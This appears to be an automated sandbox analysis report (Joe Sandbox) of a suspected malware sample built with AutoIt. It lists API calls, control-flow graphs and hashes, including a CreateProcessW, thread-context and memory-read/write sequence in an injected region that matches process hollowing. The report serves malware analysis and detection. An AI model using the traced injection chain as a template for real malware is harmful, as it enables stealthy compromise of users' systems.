                                                                    • Instruction ID: 11fa29512b5a71827cbe75e0c81b81bdb8efc98ff3712735c2a8ec96b6bd473e
                                                                    • Opcode Fuzzy Hash: 1ba340b528fb467fe2dd5faf346200962dd815d143ffd18325647f746b167310
                                                                    • Instruction Fuzzy Hash: D6B14E72D00119ABDF15DBA5CC85EDEB7BDEF4A354F1040A6FA09E6141EB309A488FA1

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 844 8e3b1c-8e3b27 845 8e3b99-8e3b9b 844->845 846 8e3b29-8e3b2e 844->846 847 8e3b8c-8e3b8f 845->847 846->845 848 8e3b30-8e3b48 RegOpenKeyExW 846->848 848->845 849 8e3b4a-8e3b69 RegQueryValueExW 848->849 850 8e3b6b-8e3b76 849->850 851 8e3b80-8e3b8b RegCloseKey 849->851 852 8e3b78-8e3b7a 850->852 853 8e3b90-8e3b97 850->853 851->847 854 8e3b7e 852->854 853->854 854->851
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,008E3B0F,SwapMouseButtons,00000004,?), ref: 008E3B40
                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,008E3B0F,SwapMouseButtons,00000004,?), ref: 008E3B61
                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,008E3B0F,SwapMouseButtons,00000004,?), ref: 008E3B83
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: Control Panel\Mouse
                                                                    • API String ID: 3677997916-824357125
                                                                    • Opcode ID: 943029f5403c18c13af5867561068ab75728ff3def97446552416a243aa09068
                                                                    • Instruction ID: 138c870f523182f876e39726db9546ee4798ffce5e6e5abaad04edc34de04b8b
                                                                    • Opcode Fuzzy Hash: 943029f5403c18c13af5867561068ab75728ff3def97446552416a243aa09068
                                                                    • Instruction Fuzzy Hash: 7A112AB5620248FFDB208FA6DC48AAEB7B8FF86754B104559E806D7110D2319E40A7A0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 855 be0a68-be0b08 call be2ed8 * 3 862 be0b1f 855->862 863 be0b0a-be0b14 855->863 865 be0b26-be0b2f 862->865 863->862 864 be0b16-be0b1d 863->864 864->865 866 be0b36-be11e8 865->866 867 be11ea-be11ee 866->867 868 be11fb-be1228 CreateProcessW 866->868 869 be1234-be1261 867->869 870 be11f0-be11f4 867->870 876 be122a-be122d 868->876 877 be1232 868->877 890 be126b 869->890 891 be1263-be1266 869->891 871 be126d-be129a 870->871 872 be11f6 870->872 875 be12a4-be12be Wow64GetThreadContext 871->875 897 be129c-be129f 871->897 872->875 880 be12c5-be12e0 ReadProcessMemory 875->880 881 be12c0 875->881 878 be1629-be162b 876->878 877->875 883 be12e7-be12f0 880->883 884 be12e2 880->884 882 be15d2-be15d6 881->882 888 be15d8-be15dc 882->888 889 be1627 882->889 886 be1319-be1338 call be2558 883->886 887 be12f2-be1301 883->887 884->882 904 be133f-be1362 call be2698 886->904 905 be133a 886->905 887->886 893 be1303-be1312 call be24a8 887->893 894 be15de-be15ea 888->894 895 be15f1-be15f5 888->895 889->878 890->875 891->878 893->886 910 be1314 893->910 894->895 900 be15f7-be15fa 895->900 901 be1601-be1605 895->901 897->878 900->901 906 be1607-be160a 901->906 907 be1611-be1615 901->907 914 be13ac-be13cd call be2698 904->914 915 be1364-be136b 904->915 905->882 906->907 908 be1617-be161d call be24a8 907->908 909 be1622-be1625 907->909 908->909 909->878 910->882 922 be13cf 914->922 923 be13d4-be13f2 call be2ef8 914->923 916 be136d-be139e call be2698 915->916 917 be13a7 915->917 924 be13a5 916->924 925 be13a0 916->925 917->882 922->882 928 be13fd-be1407 923->928 924->914 925->882 929 be143d-be1441 928->929 930 be1409-be143b call be2ef8 928->930 932 be152c-be1549 call be20a8 929->932 933 be1447-be1457 929->933 930->928 940 be154b 932->940 941 be1550-be156f Wow64SetThreadContext 932->941 933->932 935 be145d-be146d 933->935 935->932 939 be1473-be1497 935->939 942 be149a-be149e 939->942 940->882 943 be1573-be157e call be23d8 941->943 944 be1571 941->944 942->932 945 be14a4-be14b9 942->945 951 be1582-be1586 943->951 952 be1580 943->952 944->882 947 be14cd-be14d1 945->947 949 be150f-be1527 947->949 950 be14d3-be14df 947->950 949->942 953 be150d 950->953 954 be14e1-be150b 950->954 955 be1588-be158b 951->955 956 be1592-be1596 951->956 952->882 953->947 954->953 955->956 958 be1598-be159b 956->958 959 be15a2-be15a6 956->959 958->959 960 be15a8-be15ab 959->960 961 be15b2-be15b6 959->961 960->961 962 be15b8-be15be call be24a8 961->962 963 be15c3-be15cc 961->963 962->963 963->866 963->882
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00BE1223
                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00BE12B9
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00BE12DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743712764.0000000000BDF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BDF000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bdf000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 2438371351-0
                                                                    • Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                    • Instruction ID: 6188dc125954a203ca362241d303836e61b4cf74bb4e990651bed009f4737a1e
                                                                    • Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                    • Instruction Fuzzy Hash: 8762FA30A14258DBEB24CFA5C851BDEB3B6EF58300F2095A9D10DEB390E7759E81CB59
                                                                    Strings
                                                                    • Variable must be of type 'Object'., xrefs: 009332B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Variable must be of type 'Object'.
                                                                    • API String ID: 0-109567571
                                                                    • Opcode ID: 56edcf0b6036356a33ff2563a2ce5f86573fa3f0576c26e65fffd59e25d64aa2
                                                                    • Instruction ID: a371b0c4d6928c44be04b45427e4c1761d266b45c219eeda48fbbe8831d1e0c8
                                                                    • Opcode Fuzzy Hash: 56edcf0b6036356a33ff2563a2ce5f86573fa3f0576c26e65fffd59e25d64aa2
                                                                    • Instruction Fuzzy Hash: ABC29B71A00259DFCB24CF69C880AADB7B1FF1A314F248169E956EB3A1D371ED41CB91
                                                                    APIs
                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009233A2
                                                                      • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008E3A04
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                                    • String ID: Line:
                                                                    • API String ID: 2289894680-1585850449
                                                                    • Opcode ID: ad382b0a777467002f66de1e22a3007471b658f28a15e40e7bfa2893951b9471
                                                                    • Instruction ID: c94a7681c2cb88397a578abab713ff785233dcfd0ecb6ca9e84a94173f2233f1
                                                                    • Opcode Fuzzy Hash: ad382b0a777467002f66de1e22a3007471b658f28a15e40e7bfa2893951b9471
                                                                    • Instruction Fuzzy Hash: 8831C271418394AAC325EB25DC49BEBB7D8FF82724F50462AF599C3191EB709A48C7C3
                                                                    APIs
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00900668
                                                                      • Part of subcall function 009032A4: RaiseException.KERNEL32(?,?,?,0090068A,?,009B1444,?,?,?,?,?,?,0090068A,008E1129,009A8738,008E1129), ref: 00903304
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00900685
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                    • String ID: Unknown exception
                                                                    • API String ID: 3476068407-410509341
                                                                    • Opcode ID: a914872bbab0cbcef06ed4b9bc053d8f38c268dcc6df112231f76efc92e68747
                                                                    • Instruction ID: c74cdf7927a7ced5e64b6f540f8db469b57a3ca93674f4357a24629098ce21c1
                                                                    • Opcode Fuzzy Hash: a914872bbab0cbcef06ed4b9bc053d8f38c268dcc6df112231f76efc92e68747
                                                                    • Instruction Fuzzy Hash: 60F0442490020D6FCB10B675DC46F5E776DAEC0354F604531BA24D65D2EF71DA6589C0
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0095302F
                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00953044
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Temp$FileNamePath
                                                                    • String ID: aut
                                                                    • API String ID: 3285503233-3010740371
                                                                    • Opcode ID: cfd51b1d9c4ccc2d056b827d218d750391c388e4d5160f1e9dd9ceb653706fbd
                                                                    • Instruction ID: 47da988782df8b08e7e327ec00b4eba3b063bf2778b7a173e279acf8fce7626a
                                                                    • Opcode Fuzzy Hash: cfd51b1d9c4ccc2d056b827d218d750391c388e4d5160f1e9dd9ceb653706fbd
                                                                    • Instruction Fuzzy Hash: 2CD05EB350032877DB20A7A4AC0EFCB3A6CDB05750F4002A1B669E2096DAB0DA84CBD0
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 009682F5
                                                                    • TerminateProcess.KERNEL32(00000000), ref: 009682FC
                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 009684DD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                    • String ID:
                                                                    • API String ID: 146820519-0
                                                                    • Opcode ID: 25966c1b0c18e2d45c17ff5e2a4930119b002eed2bf298dffd498123b2e0fb4b
                                                                    • Instruction ID: acc18e9b5cd1b756d837c93b2a4a688a069687164545a219deec215159c77a35
                                                                    • Opcode Fuzzy Hash: 25966c1b0c18e2d45c17ff5e2a4930119b002eed2bf298dffd498123b2e0fb4b
                                                                    • Instruction Fuzzy Hash: 37126B71A083419FC714DF28C484B6ABBE5FF89318F048A5DE8998B352DB71ED45CB92
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 821471b922f5ae36ba3d42c97d9aeff1e306e536d29eeb81bf0049080e723cd6
                                                                    • Instruction ID: aa85da204a3a84f36b6be8dab518bf68bb2f5e17be24a863ef18be3d50255396
                                                                    • Opcode Fuzzy Hash: 821471b922f5ae36ba3d42c97d9aeff1e306e536d29eeb81bf0049080e723cd6
                                                                    • Instruction Fuzzy Hash: F151CD71F0460DDFCB20AFA8C945BEEBBB8AFC5310F17005AF405A7291D7759A819BA1
                                                                    APIs
                                                                      • Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008E1BF4
                                                                      • Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 008E1BFC
                                                                      • Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008E1C07
                                                                      • Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008E1C12
                                                                      • Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 008E1C1A
                                                                      • Part of subcall function 008E1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 008E1C22
                                                                      • Part of subcall function 008E1B4A: RegisterWindowMessageW.USER32(00000004,?,008E12C4), ref: 008E1BA2
                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008E136A
                                                                    • OleInitialize.OLE32 ref: 008E1388
                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 009224AB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                    • String ID:
                                                                    • API String ID: 1986988660-0
                                                                    • Opcode ID: 18a7a7f7f96cbf457ce990c82ed8011996a5742e37a023310bd357747da085f8
                                                                    • Instruction ID: 2e12c046835f2eb05047788c8257edba38602bc180b62c3ce7e4e0a3700defc5
                                                                    • Opcode Fuzzy Hash: 18a7a7f7f96cbf457ce990c82ed8011996a5742e37a023310bd357747da085f8
                                                                    • Instruction Fuzzy Hash: B271C2B59293408FC7A4DF7AAA656953BE1FB893603D4832EE01AC7271EBB04440EF51
                                                                    APIs
                                                                      • Part of subcall function 008E3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 008E3A04
                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0094C259
                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 0094C261
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0094C270
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_Timer$Kill
                                                                    • String ID:
                                                                    • API String ID: 3500052701-0
APIs
• CloseHandle.KERNELBASE(00000000,00000000,?,?,009185CC,?,009A8CC8,0000000C), ref: 00918704
• GetLastError.KERNEL32(?,009185CC,?,009A8CC8,0000000C), ref: 0091870E
• __dosmaperr.LIBCMT ref: 00918739
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID:
• API String ID: 2583163307-0
APIs
• TranslateMessage.USER32(?), ref: 008EDB7B
• DispatchMessageW.USER32(?), ref: 008EDB89
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008EDB9F
• Sleep.KERNEL32(0000000A), ref: 008EDBB1
• TranslateAcceleratorW.USER32(?,?,?), ref: 00931CC9
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
Similarity
• API ID: Message$Translate$AcceleratorDispatchPeekSleep
• String ID:
• API String ID: 3288985973-0
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00952CD4,?,?,?,00000004,00000001), ref: 00952FF2
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00952CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00953006
• CloseHandle.KERNEL32(00000000,?,00952CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0095300D
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
APIs
• __Init_thread_footer.LIBCMT ref: 008F17F6
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
Similarity
• API ID: Init_thread_footer
• String ID: CALL
• API String ID: 1385522511-4196123274
APIs
• _wcslen.LIBCMT ref: 00956F6B
  • Part of subcall function 008E4ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4EFD
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
Similarity
• API ID: LibraryLoad_wcslen
• String ID: >>>AUTOIT SCRIPT<<<
• API String ID: 3312870042-2806939583
APIs
• GetOpenFileNameW.COMDLG32(?), ref: 00922C8C
  • Part of subcall function 008E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E3A97,?,?,008E2E7F,?,?,?,00000000), ref: 008E3AC2
  • Part of subcall function 008E2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008E2DC4
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
Similarity
• API ID: Name$Path$FileFullLongOpen
• String ID: X
• API String ID: 779396738-3081909835
APIs
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 008E3908
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
Similarity
• API ID: IconNotifyShell_
• String ID:
• API String ID: 1144537725-0
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00BE1223
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00BE12B9
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00BE12DB
Memory Dump Source
• Source File: 00000000.00000002.1743712764.0000000000BDF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BDF000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bdf000_3HnH4uJtE7.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
APIs
  • Part of subcall function 008E4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,008E4EDD,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E9C
  • Part of subcall function 008E4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008E4EAE
